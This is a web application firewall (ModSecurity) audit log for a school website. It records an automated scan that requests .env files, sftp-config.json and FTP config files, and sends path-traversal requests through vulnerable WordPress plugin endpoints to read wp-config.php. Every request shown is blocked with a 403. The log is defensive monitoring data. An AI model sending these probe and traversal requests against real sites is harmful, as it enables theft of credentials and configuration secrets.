[23/Apr/2025:23:13:25 +0700] aAkRpRuwXEWV6ydgl52X6gAAAAk 103.236.140.4 38144 103.236.140.4 8181
--33d47417-B--
GET /old/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--33d47417-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--33d47417-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424805083162 702 (- - -)
Stopwatch2: 1745424805083162 702; combined=267, p1=238, p2=0, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--33d47417-Z--
--6f92da5e-A--
[23/Apr/2025:23:13:25 +0700] aAkRpdIw_rqnm4P5_afOKQAAAFM 103.236.140.4 38150 103.236.140.4 8181
--6f92da5e-B--
GET /dev/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--6f92da5e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6f92da5e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424805277054 824 (- - -)
Stopwatch2: 1745424805277054 824; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6f92da5e-Z--
--57afc463-A--
[23/Apr/2025:23:13:25 +0700] aAkRpRuwXEWV6ydgl52X7AAAAA8 103.236.140.4 38152 103.236.140.4 8181
--57afc463-B--
GET /.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--57afc463-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--57afc463-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424805470588 662 (- - -)
Stopwatch2: 1745424805470588 662; combined=247, p1=221, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--57afc463-Z--
--9bdb715f-A--
[23/Apr/2025:23:13:25 +0700] aAkRpTI97BrbgvDq16RsTgAAAM0 103.236.140.4 38162 103.236.140.4 8181
--9bdb715f-B--
GET /public/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--9bdb715f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9bdb715f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424805663565 804 (- - -)
Stopwatch2: 1745424805663565 804; combined=303, p1=263, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9bdb715f-Z--
--746dc911-A--
[23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YFQAAAAA 103.236.140.4 38310 103.236.140.4 8181
--746dc911-B--
GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--746dc911-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--746dc911-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424811172276 748 (- - -)
Stopwatch2: 1745424811172276 748; combined=272, p1=240, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--746dc911-Z--
--7e3bc871-A--
[23/Apr/2025:23:13:31 +0700] aAkRq9Iw_rqnm4P5_afOMwAAAFQ 103.236.140.4 38316 103.236.140.4 8181
--7e3bc871-B--
GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--7e3bc871-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7e3bc871-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424811365703 869 (- - -)
Stopwatch2: 1745424811365703 869; combined=290, p1=253, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7e3bc871-Z--
--47831a74-A--
[23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YGAAAAAE 103.236.140.4 38322 103.236.140.4 8181
--47831a74-B--
GET /force-download.php?file=wp-config.php HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--47831a74-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47831a74-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424811562729 745 (- - -)
Stopwatch2: 1745424811562729 745; combined=232, p1=206, p2=0, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47831a74-Z--
--1e246344-A--
[23/Apr/2025:23:13:31 +0700] aAkRqz1ahuoJLEjKiAU06gAAAIA 103.236.140.4 38328 103.236.140.4 8181
--1e246344-B--
GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--1e246344-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1e246344-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424811757016 791 (- - -)
Stopwatch2: 1745424811757016 791; combined=338, p1=307, p2=0, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1e246344-Z--
--1635d318-A--
[23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YGwAAAAs 103.236.140.4 38334 103.236.140.4 8181
--1635d318-B--
GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--1635d318-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1635d318-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424811950841 791 (- - -)
Stopwatch2: 1745424811950841 791; combined=297, p1=268, p2=0, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1635d318-Z--
--dc22d062-A--
[23/Apr/2025:23:13:33 +0700] aAkRrRuwXEWV6ydgl52YKAAAAAg 103.236.140.4 38376 103.236.140.4 8181
--dc22d062-B--
GET /.vscode/sftp-config.json HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--dc22d062-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dc22d062-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424813927266 809 (- - -)
Stopwatch2: 1745424813927266 809; combined=316, p1=257, p2=0, p3=0, p4=0, p5=59, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dc22d062-Z--
--381c6e7e-A--
[23/Apr/2025:23:13:34 +0700] aAkRrjI97BrbgvDq16RsUQAAANg 103.236.140.4 38380 103.236.140.4 8181
--381c6e7e-B--
GET /resources/sftp-config.json HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--381c6e7e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--381c6e7e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424814121584 874 (- - -)
Stopwatch2: 1745424814121584 874; combined=353, p1=316, p2=0, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--381c6e7e-Z--
--6bf96b3d-A--
[23/Apr/2025:23:13:34 +0700] aAkRrjI97BrbgvDq16RsUwAAAMc 103.236.140.4 38388 103.236.140.4 8181
--6bf96b3d-B--
GET /ftp.config HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--6bf96b3d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6bf96b3d-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424814517890 2204 (- - -)
Stopwatch2: 1745424814517890 2204; combined=881, p1=420, p2=436, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6bf96b3d-Z--
--b09fd64a-A--
[23/Apr/2025:23:13:36 +0700] aAkRsNIw_rqnm4P5_afONQAAAFY 103.236.140.4 38458 103.236.140.4 8181
--b09fd64a-B--
GET /ftp.config HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--b09fd64a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b09fd64a-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424816684372 2462 (- - -)
Stopwatch2: 1745424816684372 2462; combined=862, p1=423, p2=412, p3=0, p4=0, p5=27, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b09fd64a-Z--
--2136dc32-A--
[23/Apr/2025:23:13:37 +0700] aAkRsdIw_rqnm4P5_afONwAAAEg 103.236.140.4 38492 103.236.140.4 8181
--2136dc32-B--
GET /ftps.config HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--2136dc32-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2136dc32-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424817668376 2049 (- - -)
Stopwatch2: 1745424817668376 2049; combined=691, p1=311, p2=358, p3=0, p4=0, p5=21, sr=56, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2136dc32-Z--
--73f00b6b-A--
[23/Apr/2025:23:13:37 +0700] aAkRsT1ahuoJLEjKiAU07wAAAIU 103.236.140.4 38498 103.236.140.4 8181
--73f00b6b-B--
GET /ftp-config.conf HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--73f00b6b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--73f00b6b-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424817867832 2186 (- - -)
Stopwatch2: 1745424817867832 2186; combined=880, p1=441, p2=411, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--73f00b6b-Z--
--3f4fa304-A--
[23/Apr/2025:23:13:38 +0700] aAkRstIw_rqnm4P5_afOOgAAAEs 103.236.140.4 38510 103.236.140.4 8181
--3f4fa304-B--
GET /prevlaravel/sftp-config.json HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--3f4fa304-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3f4fa304-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424818260104 906 (- - -)
Stopwatch2: 1745424818260104 906; combined=404, p1=370, p2=0, p3=0, p4=0, p5=34, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3f4fa304-Z--
--c4184b3a-A--
[23/Apr/2025:23:13:38 +0700] aAkRsj1ahuoJLEjKiAU08AAAAIo 103.236.140.4 38516 103.236.140.4 8181
--c4184b3a-B--
GET /sftp-config.json HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--c4184b3a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c4184b3a-H--
